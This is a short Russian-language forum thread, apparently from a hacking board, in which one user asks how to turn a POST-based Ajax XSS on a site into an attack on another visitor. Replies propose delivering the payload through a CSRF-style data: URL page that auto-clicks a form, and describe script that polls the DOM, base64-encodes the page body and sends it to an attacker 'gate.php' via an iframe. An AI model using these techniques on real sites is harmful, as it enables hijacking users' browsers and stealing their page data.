PDA

Просмотр полной версии : XSS в выводе информации с Ajax


Elva
19.05.2017, 14:02
Имеется форма запроса по адресу - domen.com/info/

При нажатии на кнопку, идет POST запрос domen.com/ajax?action=getInfo

На domen.com/info/ выводится полученная информация из запроса, в той же странице.

При отправке JS в POST запросе, код успешно внедряется в domen.com/info/

Токенов нету.

Задача:Реализовать XSS атаку на пользователя находящегося на domen.com/info/

Проблема:Не разберусь как отправить POST запрос, чтобы он вывелся в рамках той же страницы.

Это возможно?

SooLFaa
01.06.2017, 19:23
data:text/html, document.getElementById('a').click()

Это в браузер, т.е. задействуя csrf это можно сделать.

crlf
01.06.2017, 23:01
Похоже на Self-XSS.

ol1ver
01.06.2017, 23:27
При отправке JS в POST запросе, код успешно внедряется в domen.com/info/


попробуйте внедрить свой .js код на страницу domen.com/info

а в нем как вариант через setInterval(цикл) чекать вхождение DOM элемента (который появляется только при post запросе), появился - пакуем DOM тело страницы и шлем. Под понятием шлем - iframe src="gate.php?data=base64encode_dom_body"